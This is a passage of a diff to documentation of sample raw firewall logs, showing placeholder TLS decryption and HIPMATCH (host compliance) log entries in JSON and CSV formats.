"TimeReceived": "2024-11-20T16:40:01.000000Z", + "DeviceSN": "no-serial", + "LogType": "DECRYPTION", + "Subtype": "start", + "SubType": "start", + "ConfigVersion": "10.2", + "TimeGenerated": "2024-11-20T16:39:51.000000Z", + "SourceAddress": "1.2.3.4", + "DestinationAddress": "5.6.7.8", + "NATSource": "4.3.2.1", + "NATDestination": "8.7.6.5", + "Rule": "URL Filtering - Chrome Profile", + "SourceUser": "example\\jdoe", + "DestinationUser": null, + "Application": "incomplete", + "VirtualLocation": "vsys1", + "FromZone": "VPN-SSL", + "ToZone": "INTERNET", + "InboundInterface": "tunnel.16", + "OutboundInterface": "ethernet1/1", + "LogSetting": "Forward-Syslog", + "TimeReceivedManagementPlane": "2024-11-20T16:39:51.000000Z", + "SessionID": 2222222, + "RepeatCount": 1, + "CountOfRepeat": 1, + "SourcePort": 58877, + "DestinationPort": 443, + "NATSourcePort": 1042, + "NATDestinationPort": 443, + "Protocol": "tcp", + "Action": "allow", + "Tunnel": "N/A", + "SourceUUID": null, + "DestinationUUID": null, + "RuleUUID": "eaf45b26-01ef-496c-990d-bbd1d89f2ed5", + "ClientToFirewall": "Finished", + "FirewallToClient": "Client_Hello", + "TLSVersion": "TLS1.2", + "TLSKeyExchange": "ECDHE", + "TLSEncryptionAlgorithm": "AES_256_GCM", + "TLSAuth": "SHA384", + "PolicyName": "TLS - https inspection - default rule", + "EllipticCurve": "secp256r1", + "ErrorIndex": "Protocol", + "RootStatus": "trusted", + "ChainStatus": "Trusted", + "ProxyType": "Forward", + "CertificateSerial": "059125d73c34a73fca9", + "Fingerprint": "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b", + "TimeNotBefore": 1730875569, + "TimeNotAfter": 1765176368, + "CertificateVersion": "V3", + "CertificateSize": 256, + "CommonNameLength": 13, + "IssuerNameLength": 29, + "RootCNLength": 10, + "SNILength": 23, + "CertificateFlags": 4, + "CommonName": "example.org", + "IssuerCommonName": "GlobalSign ECC OV SSL CA 2018", + "RootCommonName": "GlobalSign", + "ServerNameIndication": "static.files.example.org", + "ErrorMessage": "General TLS protocol error. Received fatal alert DecodeError from server", + "ContainerID": null, + "ContainerNameSpace": null, + "ContainerName": null, + "SourceEDL": null, + "DestinationEDL": null, + "SourceDynamicAddressGroup": null, + "DestinationDynamicAddressGroup": null, + "TimeGeneratedHighResolution": "2024-11-20T16:39:51.441000Z", + "SourceDeviceCategory": null, + "SourceDeviceProfile": null, + "SourceDeviceModel": null, + "SourceDeviceVendor": null, + "SourceDeviceOSFamily": null, + "SourceDeviceOSVersion": null, + "SourceDeviceHost": null, + "SourceDeviceMac": null, + "DestinationDeviceCategory": null, + "DestinationDeviceProfile": null, + "DestinationDeviceModel": null, + "DestinationDeviceVendor": null, + "DestinationDeviceOSFamily": null, + "DestinationDeviceOSVersion": null, + "DestinationDeviceHost": null, + "DestinationDeviceMac": null, + "SequenceNo": 1111111111111111111 + } + ``` + + + === "test_dhcp_renew_json" @@ -582,6 +690,63 @@ In this section, you will find examples of raw logs as generated natively by the +=== "test_hipmatch_csv" + + + ```json + 1,2024/11/03 18:50:04,026701003578,HIPMATCH,0,2817,2024/11/03 18:50:04,jdoe,vsys1,DESKTOP-01,Windows,1.2.3.4,VPN Compliant,1,profile,,,1111111111111111111,0x8000000000000000,28,99,38,0,,FW-CIV1,1,0.0.0.0,3a7393a4-997f-4e5b-b6e4-4ebff71dacf4,aefee8,,2024-11-03T18:50:04.310+01:00, + + ``` + + + +=== "test_hipmatch_json" + + + ```json + { + "TimeReceived": "2024-11-20T16:30:32.000000Z", + "DeviceSN": "no-serial", + "LogType": "HIPMATCH", + "Subtype": "hipmatch", + "ConfigVersion": "10.2", + "TimeGenerated": "2024-11-20T16:30:28.000000Z", + "SourceUser": "jdoe@example.org", + "VirtualLocation": "vsys1", + "EndpointDeviceName": "DESKTOP-01", + "EndpointOSType": "Windows", + "SourceIP": "1.2.3.4", + "HipMatchName": "VPN Compliant", + "RepeatCount": 1, + "CountOfRepeats": 1, + "HipMatchType": "profile", + "SequenceNo": 1111111111111111111, + "DGHierarchyLevel1": 12, + "DGHierarchyLevel2": 22, + "DGHierarchyLevel3": 0, + "DGHierarchyLevel4": 0, + "VirtualSystemName": "", + "DeviceName": "FW-ALK01", + "VirtualSystemID": 1, + "SourceIPv6": "", + "HostID": "3a7393a4-997f-4e5b-b6e4-4ebff71dacf4", + "EndpointSerialNumber": "aefee8", + "SourceDeviceCategory": null, + "SourceDeviceProfile": null, + "SourceDeviceModel": null, + "SourceDeviceVendor": null, + "SourceDeviceOSFamily": null, + "SourceDeviceOSVersion": null, + "SourceDeviceMac": null, + "SourceDeviceHost": null, + "Source": null, + "TimestampDeviceIdentification": null, + "TimeGeneratedHighResolution": "2024-11-20T16:30:28.904000Z" + } + ``` + + + === "test_installed_package_json"